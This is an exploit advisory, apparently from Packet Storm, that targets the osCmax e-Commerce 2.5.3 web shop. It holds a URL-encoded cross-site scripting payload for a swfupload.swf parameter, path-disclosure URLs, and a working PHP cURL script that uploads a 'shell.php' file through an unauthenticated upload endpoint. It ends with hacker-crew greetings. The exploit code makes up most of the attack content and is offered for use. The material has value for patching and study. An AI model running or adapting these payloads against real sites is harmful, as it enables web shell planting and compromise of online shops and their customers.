Lucene search

K
packetstormKedAns-DzPACKETSTORM:124355
HistoryDec 09, 2013 - 12:00 a.m.

osCmax e-Commerce 2.5.3 Cross Site Scripting / Shell Upload

2013-12-0900:00:00
KedAns-Dz
packetstormsecurity.com
71

0.002 Low

EPSS

Percentile

55.2%

`<?/**  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[>] Title : osCmax e-Commerce v2.5.3 (FU/ObjectInject) Multiple Vulnerabilities  
  
[>] Author : KedAns-Dz  
[+] E-mail : ked-h (@hotmail.com / @1337day.com)  
[+] FaCeb0ok : fb.me/Inj3ct0rK3d  
[+] TwiTter : @kedans  
  
[#] Platform : PHP / WebApp  
[+] Cat/Tag : Multiple , File/shell Upload , Object Injection  
  
[<] <3 <3 Greetings t0 Palestine <3 <3  
[>] <3 R.I.P NelsOn MandEla <3  
  
[ps]:   
Algeria vs Russia o.O Brazil 2014 ... u think a HaCk-WAR be coming !!?  
LOL héhéhé we are brothers in the Cyber NetWork ^__^ <3 Russia <3  
1,2,3 Viva l'Algerie | 4,5,6 we fall in love with Russian GIRL's xD lol.  
> Give me a algerian , and Korian-Car & Russian Weapon & European Enemy  
> see result : (http://static.echoroukonline.com/ara/files/2012/baki_tintin_967504998.jpg)  
  
#####  
# [!] Description :  
#  
# P.O.C :  
# - [ CVE-2013-4144 , CVE-2013-4145 , CVE-2013-4146 ]  
# - [ OSVDB-92635 ] [ 1337day-2013-20669 ]  
# - [ new 0day ]  
#  
# osCmax e-Commerce v2.5.3 is suffer from multiple vulnerabilities  
# remote attacker can upload file/shell via header attacks or exec  
# a JavaScript Code & Inject a remote Object ( see also : CVE-2013-4144 )  
#####  
# [+] Exploit (1) ' Object Injection / JS Injection ' : [ CVE-2013-4144 , OSVDB-92635 ( also found by me :p )]  
#  
# JS alert() Code : %22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28%27HaCked%20By%20KedAns-Dz%27%29;//  
#   
# http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/swfupload.swf?movieName=[ JS Code ]  
# http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/swfupload.swf?buttonImageURL=[ Object/Image URL ]  
#  
#####  
# [+] Exploit (2) ' Full Path Disclosure ' :   
# http://127.0.0.1/oxmax/ext/phpthumb/demo/phpThumb.demo.object.php  
# http://127.0.0.1/oxmax/ext/phpthumb/demo/phpThumb.demo.object.simple.php  
#####  
# [+] Exploit (3) ' File/shell Upload ' :  
#**/?>  
  
<?php  
#-----------------------------------------------------------------------------  
$headers = array("Content-Type: application/octet-stream",  
"Content-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"");  
#-----------------------------------------------------------------------------  
$shell="<?php phpinfo(); ?>"; # U'r Sh3lL h3re !  
$path ="/temp/"; # Sh3lL Path   
#-----------------------------------------------------------------------------  
$ch = curl_init("http://127.0.0.1/oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,   
array('Filedata'=>"@$shell",  
'uploadpath'=>"@$path"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
#-----------------------------------------------------------------------------  
?>  
  
# [!] find file : /temp/shell.php  
  
<?/**  
####  
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !>  
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>  
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database +>  
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *  
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **  
#---------------------------------------------------------------  
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,  
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,  
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &  
# & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , &  
# & KnocKout , Angel Injection , The Black Devils , kaMtiEz , &  
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &  
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=  
####  
**/?>  
  
# 1337day.com id:[1337day-2013-21633]  
`

0.002 Low

EPSS

Percentile

55.2%

Related for PACKETSTORM:124355